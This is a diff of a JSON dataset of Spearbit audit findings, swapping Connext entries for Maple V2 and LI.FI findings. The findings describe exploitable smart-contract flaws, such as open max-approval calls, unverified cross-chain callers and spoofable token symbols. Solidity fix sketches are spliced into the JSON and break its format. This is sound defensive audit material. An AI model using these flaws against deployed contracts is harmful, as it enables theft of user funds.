other WM and Pool function signatures start with (uint256 shares/assets, address owner) parameters but the WM.processExit has its parameters reversed (address, uint256).", "labels": [ "Spearbit", - "ConnextNxtp", + "MapleV2.pd", "Severity: Informational" ] }, { - "title": "Cache array length for loops", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Fetching array length for each iteration generally consumes more gas compared to caching it in a variable.", + "title": "Additional verification in MapleLoanInitializer", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "The MapleLoanInitializer could verify additional arguments to avoid bad pool deployments.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Gas Optimization" + "MapleV2.pd", + "Severity: Informational" ] }, { - "title": "Use custom errors instead of encoding the error message", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "TypedMemView.sol replicates the functionality provided by custom error with arguments: (, uint256 g) = encodeHex(uint256(typeOf(memView))); (, uint256 e) = encodeHex(uint256(_expected)); string memory err = string( abi.encodePacked(\"Type assertion failed. Got 0x\", uint80(g), \". 
Expected 0x\", uint80(e)) ); revert(err); encodeHex() is only used to encode a variable for an error message.", + "title": "Clean up updatePlatformServiceFee", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "The updatePlatformServiceFee can be cleaned up to use an existing helper function", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Gas Optimization" + "MapleV2.pd", + "Severity: Informational" ] }, { - "title": "Avoid OR with a zero variable", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Boolean OR operation with a zero variable is a no-op. Highlighted code above perform a boolean OR operation with a zero variable which can be avoided: newView := or(newView, shr(40, shl(40, memView))) ... newView := shl(96, or(newView, _type)) // insert type ... _encoded |= _nibbleHex(_byte >> 4); // top 4 bits", + "title": "Document restrictions on Refinancer", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "The refinancer may not set unexpected storage slots, like changing the _fundsAsset because _- drawableFunds, _refinanceInterest are still measured in the old fund's asset.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Gas Optimization" + "MapleV2.pd", + "Severity: Informational" ] }, { - "title": "Use scratch space instead of free memory", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Memory slots 0x00 and 0x20 are scratch space. So any operation in assembly that needs at most 64 bytes of memory to write temporary data can use scratch space. Functions sha2(), hash160() and hash256() use free memory to write the intermediate hash values. The scratch space can be used here since these values fit in 32 bytes. It saves gas spent on reading the free memory pointer, and memory expansion.", + "title": "Typos / Incorrect documentation", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "The code and comments contain typos or are sometimes incorrect.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Gas Optimization" + "MapleV2.pd", + "Severity: Informational" ] }, { - "title": "Redundant checks in _processMessageFromRoot() of PolygonSpokeConnector", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The function _processMessageFromRoot() of PolygonSpokeConnector does two checks on sender, which are the same: PolygonSpokeConnector.sol#L78-L82, validateSender(sender) checks sender == fxRootTunnel _setMirrorConnector() and setFxRootTunnel() set fxRootTunnel = _mirrorConnector and mirrorCon- nector = _mirrorConnector require(sender == mirrorConnector, ...) checks sender == mirrorConnector which is the same as sender == fxRootTunnel. Note: the require in _setMirrorConnector() makes sure the values can't be updated later on. So one of the checks in function _processMessageFromRoot() could be removed to save some gas and to make the code easier 104 to understand. contract PolygonSpokeConnector is SpokeConnector, FxBaseChildTunnel { function _processMessageFromRoot(..., ... require(sender == mirrorConnector, \"!sender\"); ... address sender, ... 
) validateSender(sender) { } function _setMirrorConnector(address _mirrorConnector) internal override { require(fxRootTunnel == address(0x0), ...); setFxRootTunnel(_mirrorConnector); } } abstract contract FxBaseChildTunnel is IFxMessageProcessor { function setFxRootTunnel(address _fxRootTunnel) public virtual { ... fxRootTunnel = _fxRootTunnel; // == _mirrorConnector } modifier validateSender(address sender) { require(sender == fxRootTunnel, ...); _; } }", + "title": "Receiver doesn't always reset allowance", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The function _swapAndCompleteBridgeTokens() of Receiver resets the approval to the executor at the end of an ERC20 transfer. However, if there is insufficient gas then the approval is not reset. This allows the executor to access any tokens (of the same type) left in the Receiver. function _swapAndCompleteBridgeTokens(...) ... { ... if (LibAsset.isNativeAsset(assetId)) { ... } else { // case 2: ERC20 asset ... token.safeIncreaseAllowance(address(executor), amount); if (reserveRecoverGas && gasleft() < _recoverGas) { token.safeTransfer(receiver, amount); ... return; // no safeApprove 0 } try executor.swapAndCompleteBridgeTokens{...} ... token.safeApprove(address(executor), 0); } }", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Gas Optimization" + "LIFI-retainer1", + "Severity: High Risk" ] }, { - "title": "Consider using bitmaps in _recordOutputAsSpent() of ArbitrumHubConnector", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The function _recordOutputAsSpent() stores status via a mapping of booleans. However the equivalent function recordOutputAsSpent() of Arbitrum Nitro uses a mapping of bitmaps to store the status. Doing this saves gas. Note: this saving is possible because the index values are neatly ordered. function _recordOutputAsSpent(..., uint256 _index, ...) ... { ... require(!processed[_index], \"spent\"); ... processed[_index] = true; } Arbitrum version: function recordOutputAsSpent(..., uint256 index, ... ) ... { ... (uint256 spentIndex, uint256 bitOffset, bytes32 replay) = _calcSpentIndexOffset(index); if (_isSpent(bitOffset, replay)) revert AlreadySpent(index); spent[spentIndex] = (replay | bytes32(1 << bitOffset)); }", + "title": "CelerIMFacet incorrectly sets RelayerCelerIM as receiver", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "When assigning a memory variable to a new variable, the new variable points to the same memory location. Changing any one variable updates the other variable. Here is a PoC as a Foundry test: function testCopy() public { Pp memory x = Pp({ a: 2, b: address(2) }); Pp memory y = x; y.b = address(1); assertEq(x.b, y.b); } Thus, when CelerIMFacet._startBridge() updates bridgeDataAdjusted.receiver, _bridgeData.receiver is implicitly updated too. This causes the receiver on the destination chain to be the relayer address. 
// case 'yes': bridge + dest call - send to relayer ILiFi.BridgeData memory bridgeDataAdjusted = _bridgeData; bridgeDataAdjusted.receiver = address(relayer); (bytes32 transferId, address bridgeAddress) = relayer .sendTokenTransfer{ value: msgValue }(bridgeDataAdjusted, _celerIMData); // call message bus via relayer incl messageBusFee relayer.forwardSendMessageWithTransfer{value: _celerIMData.messageBusFee}( _bridgeData.receiver, uint64(_bridgeData.destinationChainId), bridgeAddress, transferId, _celerIMData.callData );", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: High Risk" ] }, { - "title": "Move nonReentrant from process() to proveAndProcess()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The function process() has a nonReentrant modifier. The function process() is also internal and is only called from proveAndProcess(), so it is also possible to move the nonReentrant modifier to function proveAndProcess(). This would save repeatedly setting and unsetting the status of nonReentrant, which saves gas. function proveAndProcess(...) ... { ... for (uint32 i = 0; i < _proofs.length; ) { process(_proofs[i].message); unchecked { ++i; } } } function process(bytes memory _message) internal nonReentrant returns (bool _success) { ... }", + "title": "Max approval to any address is possible", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "HopFacetOptimized.setApprovalForBridges() can be called by anyone to give max approval to any address for any ERC20 token. Any ERC20 token left in the Diamond can be stolen. function setApprovalForBridges(address[] calldata bridges,address[] calldata tokensToApprove) external { ... LibAsset.maxApproveERC20(..., type(uint256).max); ... }", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: High Risk" ] }, { - "title": "OpenZeppelin libraries IERC20Permit and EIP712 are final", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The OpenZeppelin libraries have changed IERC20Permit and EIP712 to a final version, so the final versions can be used. OZERC20.sol import \"@openzeppelin/contracts/token/ERC20/extensions/draft-IERC20Permit.sol\"; import {EIP712} from \"@openzeppelin/contracts/utils/cryptography/draft-EIP712.sol\"; draft-IERC20Permit.sol // EIP-2612 is Final as of 2022-11-01. This file is deprecated. import \"./IERC20Permit.sol\"; draft-EIP712.sol // EIP-712 is Final as of 2022-08-11. This file is deprecated. import \"./EIP712.sol\";", + "title": "Return value of low-level .call() not checked", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The low-level primitive .call() doesn't revert in the caller's context when the callee reverts. If the return value is not checked, it can lead the caller to falsely believe that the call was successful. Receiver.sol uses .call() to transfer the native token to receiver. 
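A minimal sketch of the safer pattern, surfacing a failed native transfer instead of dropping the result:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.7;

// Sketch: check the success flag of the low-level call and revert (or
// otherwise handle the failure) so ETH cannot be silently lost.
contract NativeSendSketch {
    error NativeTransferFailed(address receiver, uint256 amount);

    function _sendNative(address receiver_, uint256 amount_) internal {
        (bool success_, ) = receiver_.call{ value: amount_ }("");
        if (!success_) revert NativeTransferFailed(receiver_, amount_);
    }
}
```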
If receiver reverts, this can lead to locked ETH in the Receiver contract.", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: High Risk" ] }, { - "title": "Use Foundry's multi-chain tests", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Foundry supports multi-chain testing that can be useful to catch bugs earlier in the development process. A local multi-chain environment can be used to test many scenarios not possible on test chains or in production. This is especially relevant since Connectors are a critical part of the NXTP protocol.", + "title": "Limits in LIFuelFacet", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The facet LIFuelFacet is meant for small amounts, however, it doesn't have any limits on the funds sent. This might result in funds getting stuck due to insufficient liquidity on the receiving side. function _startBridge(...) ... { ... if (LibAsset.isNativeAsset(_bridgeData.sendingAssetId)) { serviceFeeCollector.collectNativeGasFees{...}(...); } else { LibAsset.maxApproveERC20(...); serviceFeeCollector.collectTokenGasFees(...); ... } }", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: Medium Risk" ] }, { - "title": "Risk of chain split", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Domains are considered immutable (unless implementation contracts are redeployed). In case of chain splits, both forks will continue having the same domain and the recipients won't be able to tell which chain a message originated from.", + "title": "The optimal version _depositAndSwap() isn't always used", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The function _depositAndSwap() of SwapperV2 has two versions. The second version keeps _nativeReserve that is meant for fees. Several facets don't use this version although their bridge does require native fees. This could result in calls reverting due to insufficient native tokens left. function _depositAndSwap(...) ... // 4 parameter version /// @param _nativeReserve Amount of native token to prevent from being swept back to the caller function _depositAndSwap(..., uint256 _nativeReserve) ... // 5 parameter version", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: Medium Risk" ] }, { - "title": "Use zkSync's custom compiler for compiling and (integration) testing", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The protocol needs to be deployed on zkSync. For deployment, the contracts would need to be compiled with zkSync's custom compiler. The bytecode generated by the custom Solidity compiler is quite different compared to the original compiler. One thing to note is that cryptographic functions in Solidity are being replaced/inlined to static calls to zkSync's set of system precompile contracts.", + "title": "setContractOwner() is insufficient to lock down the owner", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The function transferOwnershipToZeroAddress() is meant to make the Diamond immutable. It sets the contract owner to 0. 
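A minimal sketch, with assumed storage names, of a renounce that also clears the pending owner; the bypass it prevents is described next:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.7;

// Sketch with assumed flat storage (the Diamond keeps these in library
// storage): clearing pendingOwner first makes the renounce irreversible.
contract OwnershipRenounceSketch {
    address public contractOwner;
    address public pendingOwner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    function transferOwnershipToZeroAddress() external {
        pendingOwner = address(0); // drop any in-flight transfer first
        emit OwnershipTransferred(contractOwner, address(0));
        contractOwner = address(0);
    }
}
```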
However, the contract owner can still be changed if there happens to be a pendingOwner. In that case confirmOwnershipTransfer() can still change the contract owner. function transferOwnershipToZeroAddress() external { // transfer ownership to 0 address LibDiamond.setContractOwner(address(0)); } function setContractOwner(address _newOwner) internal { DiamondStorage storage ds = diamondStorage(); address previousOwner = ds.contractOwner; ds.contractOwner = _newOwner; emit OwnershipTransferred(previousOwner, _newOwner); } function confirmOwnershipTransfer() external { Storage storage s = getStorage(); address _pendingOwner = s.newOwner; if (msg.sender != _pendingOwner) revert NotPendingOwner(); emit OwnershipTransferred(LibDiamond.contractOwner(), _pendingOwner); LibDiamond.setContractOwner(_pendingOwner); s.newOwner = LibAsset.NULL_ADDRESS; }", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: Medium Risk" ] }, { - "title": "Shared logic in SwapUtilsExternal and SwapUtils can be consolidated or their changes would need to be synched.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The SwapUtilsExternal library and SwapUtils share quite a lot of function (and event) logic. The main differences are: SwapUtilsExternal.swap does not have the following check but SwapUtils.swap does: // File: connext/libraries/SwapUtils.sol#L715 require(dx == tokenFrom.balanceOf(address(this)) - beforeBalance, \"no fee token support\"); This is actually one of the big/important diffs between the current SwapUtils and SwapUtilsExternal. Other differences are: Some functions are internal in SwapUtils, but they are external/public in SwapUtilsExternal. AmplificationUtils is basically copied in SwapUtilsExternal and its functions have been made external. SwapUtilsExternal does not implement exists. SwapUtilsExternal does not implement swapInternal. The SwapUtils's Swap struct has an extra field key as do the events in this file. Some inconsistent formatting.", + "title": "Receiver does not verify address from the originator chain", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The Receiver contract is designed to receive the cross-chain call from the libDiamond address on the destination chain. However, it does not verify the source chain address. An attacker can build a malicious _callData. An attacker can steal funds if there are tokens left and there are allowances to the Executor. Note that the tokens may be lost in issue: \"Arithmetic underflow leading to unexpected revert and loss of funds in Receiver contract\". And there may be allowances to Executor in issue \"Receiver doesn't always reset allowance\"", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: Medium Risk" ] }, { - "title": "Document why < 3s was chosen as the timestamp deviation cap for price reporting in setDirectPrice", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "setDirectPrice uses the following require statement to filter direct price reports by the owner. 
require(_timestamp - block.timestamp < 3, \"in future\"); Only prices with _timestamp within 3s of the current block timestamp are allowed to be registered.", + "title": "Arithmetic underflow leading to unexpected revert and loss of funds in Receiver contract.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The Receiver contract is designed to gracefully return the funds to users. It reserves gas for recovering funds before doing swaps via executor.swapAndCompleteBridgeTokens. The logic of reserving gas for recovering funds is implemented at Receiver.sol#L236-L258 contract Receiver is ILiFi, ReentrancyGuard, TransferrableOwnership { // ... if (reserveRecoverGas && gasleft() < _recoverGas) { // case 1a: not enough gas left to execute calls receiver.call{ value: amount }(\"\"); // ... } // case 1b: enough gas left to execute calls try executor.swapAndCompleteBridgeTokens{ value: amount, gas: gasleft() - _recoverGas }(_transactionId, _swapData, assetId, receiver) {} catch { receiver.call{ value: amount }(\"\"); } // ... } The gasleft() returns the remaining gas of a call. It is continuously decreasing, so the second query of gasleft() is smaller than the first query. Hence, if the attacker relays the transaction with a carefully crafted gas amount such that gasleft() >= _recoverGas holds at the first query but gasleft() < _recoverGas at the second, the subtraction gasleft() - _recoverGas underflows and reverts. This results in token loss in the Receiver contract.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Medium Risk" ] }, { - "title": "Document what IConnectorManager entities would be passed to BridgeFacet", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Document what type of IConnectorManager implementations would the owner or an admin set for the s.xAppConnectionManager. The only examples in the codebase are SpokeConnectors.", + "title": "Use of name to identify a token", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "startBridgeTokensViaCelerIM() uses the token symbol to identify the cfUSDC token. Another token with the same symbol can pass this check. An attacker can create a scam token with the symbol \"cfUSDC\" and a function canonical() returning a legit ERC20 token address, say WETH. If this token is passed as _bridgeData.sendingAssetId, CelerIMFacet will transfer WETH. if ( keccak256( abi.encodePacked( ERC20(_bridgeData.sendingAssetId).symbol() ) ) == keccak256(abi.encodePacked((\"cfUSDC\"))) ) { // special case for cfUSDC token asset = IERC20( CelerToken(_bridgeData.sendingAssetId).canonical() ); }", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: Medium Risk" ] }, { - "title": "Second nonReentrant modifier", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "A previous version of xcall() had a nonReentrant modifier. This modifier was removed to enable execute() to call xcall() to return data to the originator chain. To keep a large part of the original protection it is also possible to use a separate nonReentrant modifier (which uses a different storage variable) for xcall()/xcallIntoLocal(). This way both execute and xcall()/xcallIntoLocal() can be called once at the most. function xcall(...) ... { } function xcallIntoLocal(...) ... 
{ } function execute(ExecuteArgs calldata _args) external nonReentrant whenNotPaused returns (bytes32) { }", + "title": "Unvalidated destination address in Gravity facet", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "In the Gravity facet, there is an issue related to the validation of the _gravityData.destinationAddress address. The code does not validate whether the provided destination address is in the valid bech32 format. This can potentially cause issues when sending tokens to the destination address. If the provided address is not in the bech32 format, the tokens can be locked. Also, it can lead to confusion for the end-users as they might enter an invalid address and lose their tokens without any warning or error message. It is recommended to add a validation check for the _gravityData.destinationAddress.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Medium Risk" ] }, { - "title": "Return 0 in swapToLocalAssetIfNeeded()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The return in function swapToLocalAssetIfNeeded() could also return 0. Which is somewhat more readable and could save some gas. Note: after studying the compiler output it might not actually save gas. 111 function swapToLocalAssetIfNeeded(...) ... { if (_amount == 0) { return _amount; } ... }", + "title": "Hardcode or whitelist the Thorswap vault address", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The issue with this code is that the depositWithExpiry function allows the user to enter any arbitrary vault address, which could potentially lead to a loss of tokens. If a user enters an incorrect or non-existent vault address, the tokens could be lost forever. There should be some validation on the vault address to ensure that it is a valid and trusted address before allowing deposits to be made to it. Router // Deposit an asset with a memo. ETH is forwarded, ERC-20 stays in ROUTER function deposit(address payable vault, address asset, uint amount, string memory memo) public payable nonReentrant { uint safeAmount; if(asset == address(0)){ safeAmount = msg.value; bool success = vault.send(safeAmount); require(success); } else { require(msg.value == 0, \"THORChain_Router: unexpected eth\"); // protect user from accidentally locking up eth if(asset == RUNE) { safeAmount = amount; iRUNE(RUNE).transferTo(address(this), amount); iERC20(RUNE).burn(amount); } else { safeAmount = safeTransferFrom(asset, amount); // Transfer asset _vaultAllowance[vault][asset] += safeAmount; // Credit to chosen vault } } emit Deposit(vault, asset, safeAmount, memo); }", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Medium Risk" ] }, { - "title": "Use contract.code.length", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Retrieving the size of a contract is done in assembly, with extcodesize(). This can also be done in solidity which is more readable. Note: assembly might be a bit more gas efficient, especially if optimized even further: see issue \"isLocalOrigin can be optimized by using a named return parameter\".
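For the Thorswap vault finding above, a minimal sketch of the recommended whitelist. allowedVaults and VaultNotWhitelisted are illustrative names; depositWithExpiry mirrors the THORChain router entry point but is assumed here, not taken from the audited facet.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

// Illustrative sketch of whitelisting the vault before depositing.
interface IThorchainRouter {
    function depositWithExpiry(
        address payable vault,
        address asset,
        uint256 amount,
        string calldata memo,
        uint256 expiration
    ) external payable;
}

contract ThorSwapVaultSketch {
    mapping(address => bool) public allowedVaults; // maintained by governance

    error VaultNotWhitelisted();

    function _deposit(
        IThorchainRouter thorchainRouter,
        address payable vault,
        address asset,
        uint256 amount,
        string calldata memo,
        uint256 expiration
    ) internal {
        if (!allowedVaults[vault]) revert VaultNotWhitelisted();
        thorchainRouter.depositWithExpiry{ value: msg.value }(vault, asset, amount, memo, expiration);
    }
}
```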
LibDiamond.sol function enforceHasContractCode(address _contract, string memory _errorMessage) internal view { uint256 contractSize; assembly { contractSize := extcodesize(_contract) } require(contractSize != 0, _errorMessage); } AssetLogic.sol function isLocalOrigin(address _token, AppStorage storage s) internal view returns (bool) { ... uint256 _codeSize; // solhint-disable-next-line no-inline-assembly assembly { _codeSize := extcodesize(_token) } return _codeSize != 0; }", + "title": "Check enough native assets for fee", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The function _startBridge() of SquidFacet adds _squidData.fee to _bridgeData.minAmount. It has verified there is enough native asset for _bridgeData.minAmount, but not for _squidData.fee. So this could use native assets present in the Diamond, although there normally shouldn't be any native assets left. A similar issue occurs in: CelerIMFacet DeBridgeFacet function _startBridge(...) ... { ... uint256 msgValue = _squidData.fee; if (LibAsset.isNativeAsset(address(sendingAssetId))) { msgValue += _bridgeData.minAmount; } ... ... squidRouter.bridgeCall{ value: msgValue }(...); ... }", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Low Risk" ] }, { - "title": "cap and liquidity tokens", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The function addLiquidity() also adds tokens to the Connext Diamond contract. If these tokens are the same as canonical tokens it wouldn't play nicely with the cap on these tokens. For others tokens it might also be relevant to have a cap. function addLiquidity(...) ... { ... token.safeTransferFrom(msg.sender, address(this), amounts[i]); ... }", + "title": "No check on native assets", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The functions startBridgeTokensViaHopL1Native(), startBridgeTokensViaXDaiBridge() and startBridgeTokensViaMultichain() don't check _bridgeData.minAmount <= msg.value. So this could use native assets that are still in the Diamond, although that normally shouldn't happen. This might be an issue in combination with reentrancy. function startBridgeTokensViaHopL1Native(...) ... { _hopData.hopBridge.sendToL2{ value: _bridgeData.minAmount }( ... ); ... } function startBridgeTokensViaXDaiBridge(...) ... { _startBridge(_bridgeData); } function startBridgeTokensViaMultichain(...) ... { if (!LibAsset.isNativeAsset(_bridgeData.sendingAssetId)) { LibAsset.depositAsset(_bridgeData.sendingAssetId,_bridgeData.minAmount); } // no check for native assets _startBridge(_bridgeData, _multichainData); }", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Low Risk" ] }, { - "title": "Simplify _swapAssetOut()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The function _swapAssetOut() has relative complex logic where it first checks the tokens that will be received and then preforms a swap. It prevents reverting by setting the success flag. However function repayAave- Portal() still reverts if this flag is set. The comments show this was meant for reconcile(), however repaying the Aave dept in the reconcile phase no longer exists.
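For the native-asset finding above, a minimal sketch of the missing msg.value check: when bridging the native asset, require the caller to supply it rather than spending any balance that happens to sit in the Diamond. The modifier and error names are hypothetical.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

// Illustrative sketch of the suggested check.
contract NativeAmountCheckSketch {
    error InvalidAmount();

    modifier requiresNativeAmount(uint256 minAmount) {
        if (msg.value < minAmount) revert InvalidAmount();
        _;
    }

    function startBridgeTokensViaHopL1Native(uint256 minAmount)
        external
        payable
        requiresNativeAmount(minAmount)
    {
        // ... forward { value: minAmount } to the Hop bridge ...
    }
}
```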
So _swapAssetOut() could just revert if insufficiently tokens are provided. This way it would also be more similar to _swapAsset(). This will make the code more readable and safe some gas. AssetLogic.sol 113 function _swapAssetOut(...) ... returns ( bool success, ...) { ... if (ipool.exists()) { ... // Calculate slippage before performing swap. // NOTE: This is less efficient then relying on the `swapInternalOut` revert, but makes it ,! easier // to handle slippage failures (this can be called during reconcile, so must not fail). ... if (_maxIn >= ipool.calculateSwapInv(tokenIndexIn, tokenIndexOut, _amountOut)) { success = true; amountIn = ipool.swapInternalOut(tokenIndexIn, tokenIndexOut, _amountOut, _maxIn); } } else { ... uint256 _amountIn = pool.calculateSwapOutFromAddress(_assetIn, _assetOut, _amountOut); if (_amountIn <= _maxIn) { success = true; ... amountIn = pool.swapExactOut(_amountOut, _assetIn, _assetOut, _maxIn, block.timestamp + ,! 3600); } } } function swapFromLocalAssetIfNeededForExactOut(...) { ... return _swapAssetOut(_key, _asset, adopted, _amount, _maxIn); } PortalFacet.sol function repayAavePortal(...) { ... (bool success, ..., ...) = AssetLogic.swapFromLocalAssetIfNeededForExactOut(...); if (!success) revert PortalFacet__repayAavePortal_swapFailed(); ... }", + "title": "Missing doesNotContainDestinationCalls()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The functions startBridgeTokensViaLIFuel() and swapAndStartBridgeTokensViaLIFuel() don't have doesNotContainDestinationCalls(). function startBridgeTokensViaLIFuel(...) external payable nonReentrant refundExcessNative(payable(msg.sender)) doesNotContainSourceSwaps(_bridgeData) validateBridgeData(_bridgeData) { ... }", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Low Risk" ] }, { - "title": "Return default false in the function end", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "verify function is missing a default return value. A return value of false can be added on the function end", + "title": "Race condition in _startBridge of LIFuelFacet.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "If the mapping for FEE_COLLECTOR_NAME hasn't been set up yet, then serviceFeeCollector will be address(0) in function _startBridge of LIFuelFacet. This might give unexpected results. function _startBridge(...) ... { ... ServiceFeeCollector serviceFeeCollector = ServiceFeeCollector( LibMappings.getPeripheryRegistryMappings().contracts[FEE_COLLECTOR_NAME] ); ... } function getPeripheryContract(string calldata _name) external view returns (address) { return LibMappings.getPeripheryRegistryMappings().contracts[_name]; }", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Low Risk" ] }, { - "title": "Change occurances of whitelist to allowlist", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "In the codebase, whitelist is used to represent entities or objects that are allowed to be used or perform certain tasks.
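For the LIFuelFacet race-condition finding above, a minimal sketch of failing loudly when the periphery registry has no entry for the fee collector. The string-keyed registry mapping and error name stand in for LibMappings and a custom error; they are not the audited code.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

// Illustrative sketch of guarding against an unset registry entry.
contract LIFuelRegistrySketch {
    error ServiceFeeCollectorNotSet();

    mapping(string => address) private registry; // stand-in for LibMappings

    function _feeCollector(string memory name) internal view returns (address collector) {
        collector = registry[name];
        if (collector == address(0)) revert ServiceFeeCollectorNotSet();
    }
}
```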
